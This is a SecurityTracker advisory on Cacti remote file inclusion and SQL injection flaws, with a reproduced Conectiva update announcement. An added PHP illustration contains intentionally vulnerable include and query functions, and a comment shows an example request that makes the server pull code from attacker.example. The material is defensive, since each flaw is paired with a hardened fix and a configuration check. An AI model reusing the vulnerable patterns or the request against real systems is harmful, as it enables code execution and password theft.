(Conectiva Issues Fix) Cacti Input Validation Holes Let Remote Users Inject SQL Commands and Execute Arbitrary Commands
SecurityTracker Alert ID: 1014435
SecurityTracker URL: http://securitytracker.com/id/1014435
CVE Reference: CVE-2005-1524, CVE-2005-1525, CVE-2005-1526
Date: Jul 9 2005
Impact: Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available: Yes
Vendor Confirmed: Yes
Version(s): prior to 0.8.6e
Description:
Three input validation vulnerabilities were reported in Cacti versions prior to 0.8.6e. A remote user can inject SQL commands, and a remote user can cause the application to include and execute arbitrary PHP code on the target system.
The software does not properly validate user-supplied input. Several scripts pass the 'id' request parameter into SQL queries without validation, so a remote user can supply specially crafted parameter values to execute SQL commands on the underlying database [CVE-2005-1525]. According to the Conectiva announcement reproduced below, this can be used to recover the Cacti administrative password.
If 'register_globals' is set to 'on' in the target web server's 'php.ini', a remote user can supply a specially crafted URL that overwrites PHP variables used in include statements in top_graph_header.php [CVE-2005-1524] and config_settings.php [CVE-2005-1526], causing the application to include and execute PHP code fetched from a remote site. The included code, and any operating system commands it runs, executes with the privileges of the target web service.
The vendor credits iDEFENSE with reporting these vulnerabilities.
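The following PHP is an added illustration and is not Cacti's own code: it shows the two bug classes this alert describes (a remote file inclusion made possible by register_globals, and SQL injection through an unchecked 'id' parameter) in a vulnerable form beside a hardened form, plus a start-up check for the interpreter settings involved. The variable $config['library_path'], the table name graph_templates, the lib/ directory and the example request URL are assumptions chosen for the illustration, not details taken from Cacti.

```php
<?php
// Added illustration; not Cacti's code. $config['library_path'],
// graph_templates, lib/ and the example request are assumptions.

// 1. Remote file inclusion via register_globals.
// With register_globals=On, a request such as
//   GET /top_graph_header.php?config[library_path]=http://attacker.example
// makes PHP create $config['library_path'] from the query string before the
// script assigns it, so the include below fetches and runs attacker-supplied
// PHP whenever the interpreter permits URL includes.
function vulnerable_include()
{
    global $config;   // may already hold request-supplied values
    include_once($config['library_path'] . '/adodb/adodb.inc.php');
}

// Hardened form: derive the path from a fixed, local value rather than
// trusting a pre-existing global, and refuse anything that resolves outside
// the application's own lib/ directory. Setting register_globals=Off in
// php.ini removes the root cause; this check is defence in depth.
function hardened_include()
{
    $libdir = realpath(dirname(__FILE__) . '/lib');
    $path   = ($libdir === false) ? false : realpath($libdir . '/adodb/adodb.inc.php');
    if ($libdir === false || $path === false
        || strpos($path, $libdir . DIRECTORY_SEPARATOR) !== 0) {
        die('library path is missing or outside the application directory');
    }
    include_once($path);
}

// 2. SQL injection through the 'id' parameter.
// The raw request value is interpolated into the query, so an id carrying a
// UNION SELECT against the user table turns a template lookup into a dump of
// another table's rows, which is how an administrative password is recovered.
function vulnerable_query(PDO $db, $id)
{
    return $db->query("SELECT * FROM graph_templates WHERE id=$id")->fetchAll();
}

// Hardened form: the application expects an integer primary key, so enforce
// that before the value reaches SQL, then bind it as a typed parameter so the
// database never parses user input as SQL.
function hardened_query(PDO $db, $id)
{
    if (!preg_match('/^[0-9]{1,10}$/', (string) $id)) {
        die('invalid id');
    }
    $stmt = $db->prepare('SELECT * FROM graph_templates WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 3. Deployment check: report the interpreter settings that make the
// inclusion bugs exploitable. Returns a list of problems (empty when the
// configuration is acceptable).
function check_php_settings()
{
    $problems = array();
    if (ini_get('register_globals')) {
        $problems[] = 'register_globals is On; set it Off in php.ini';
    }
    if (ini_get('allow_url_include')) {
        $problems[] = 'allow_url_include is On; set it Off in php.ini';
    }
    return $problems;
}

foreach (check_php_settings() as $problem) {
    echo $problem, "\n";
}
```

The two halves match the two sides of the fix in this alert: the package update replaces the unsafe include and query patterns in the scripts, while register_globals=Off in php.ini removes the precondition the alert names for arbitrary code execution. Run the check on any host that still serves an old Cacti tree; an empty result means the interpreter settings no longer expose the inclusion bugs, but the SQL injection is only closed by upgrading.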
Impact:
A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
A remote user can execute SQL commands on the underlying database.
Solution:
Conectiva has released updated packages (cacti 0.8.6f) for Conectiva Linux 9 and 10. Note that, per the Conectiva announcement below, the cacti cron entry must be changed from cmd.php to poller.php after upgrading, and on Conectiva Linux 9 the database must also be converted.
ftp://atualizacoes.conectiva.com.br/10/SRPMS/cacti-0.8.6f-56117U10_4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cacti-0.8.6f-56117U10_4cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/9/SRPMS/cacti-0.8.6f-22563U90_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cacti-0.8.6f-22563U90_3cl.noarch.rpm
Vendor URL: www.raxnet.net/products/cacti/
Cause:
Input validation error
Underlying OS:
Linux (Conectiva)
Message History:
This archive entry is a follow-up to the message listed below.
Source Message Contents
Date: Thu, 7 Jul 2005 10:20:20 -0300
Subject: [Conectiva-updates] [CLA-2005:978] Conectiva Security Announcement
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --------------------------------------------------------------------------
CONECTIVA LINUX SECURITY ANNOUNCEMENT
- --------------------------------------------------------------------------
PACKAGE : cacti
SUMMARY : Security fixes for Cacti
DATE : 2005-07-07 10:20:00
ID : CLA-2005:978
RELEVANT RELEASES : 9, 10
- -------------------------------------------------------------------------
DESCRIPTION
Cacti[1] is a complete data graphing solution that provides a
fast poller, advanced graph templating, multiple data acquisition
methods and user management features out of the box.
This announcement fixes the following security issues with Cacti:
1. CAN-2005-1524 [2,3]
Cacti contains an input validation error in the
top_graph_header.php script that allows an attacker to include
arbitrary PHP code from remote sites. This in effect allows arbitrary
code execution with the privileges of the web server.
2. CAN-2005-1525 [4,5]
Cacti contains an input validation error in the config_settings.php
script which allows an attacker to execute arbitrary SQL queries.
This in effect allows an attacker to recover the administrative
password for the Cacti installation. Various scripts are vulnerable
to SQL injection using the 'id' variable.
3. CAN-2005-1526 [6,7]
Cacti contains an input validation error in the config_settings.php
script which allows an attacker to include arbitrary PHP code from
remote sites. This in effect allows arbitrary code execution with the
privileges of the web server.
IMPORTANT
For Conectiva Linux 10:
The cacti cron command must be changed from
'/srv/www/default/html/cacti/cmd.php' to
'/srv/www/default/html/cacti/poller.php' in order to get the new
cacti properly working.
For Conectiva Linux 9:
The database must be converted in order to make cacti work again and
also apply the above cron change.
For additional information on upgrading cacti please refer to the
file /srv/www/default/html/cacti/docs/INSTALL included in the
package.
SOLUTION
It is recommended that all Cacti users upgrade their packages.
REFERENCES
1. http://www.cacti.net
2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1524
3. http://www.idefense.com/application/poi/display?id=265&type=vulnerabilities&flashstatus=true
4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1525
5. http://www.idefense.com/application/poi/display?id=267&type=vulnerabilities&flashstatus=true
6. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1526
7. http://www.idefense.com/application/poi/display?id=266&type=vulnerabilities&flashstatus=true
UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/10/SRPMS/cacti-0.8.6f-56117U10_4cl.src.rpm
ftp://atualizacoes.conectiva.com.br/10/RPMS/cacti-0.8.6f-56117U10_4cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/9/SRPMS/cacti-0.8.6f-22563U90_3cl.src.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/cacti-0.8.6f-22563U90_3cl.noarch.rpm
ADDITIONAL INSTRUCTIONS
The apt tool can be used to perform RPM package upgrades:
- run: apt-get update
- after that, execute: apt-get upgrade
Detailed instructions regarding the use of apt and upgrade examples
can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en
- -------------------------------------------------------------------------
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en
- -------------------------------------------------------------------------
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en
- -------------------------------------------------------------------------
Copyright (c) 2004 Conectiva Inc.
http://www.conectiva.com
- -------------------------------------------------------------------------
subscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br
unsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQFCzSwT42jd0JmAcZARAhx+AKCXmONDcA8mgsMnlHFUwse+D2bXFACgwhzJ
BYGJDQhaXGNPpp6Xv7+0ndU=
=Ht75
-----END PGP SIGNATURE-----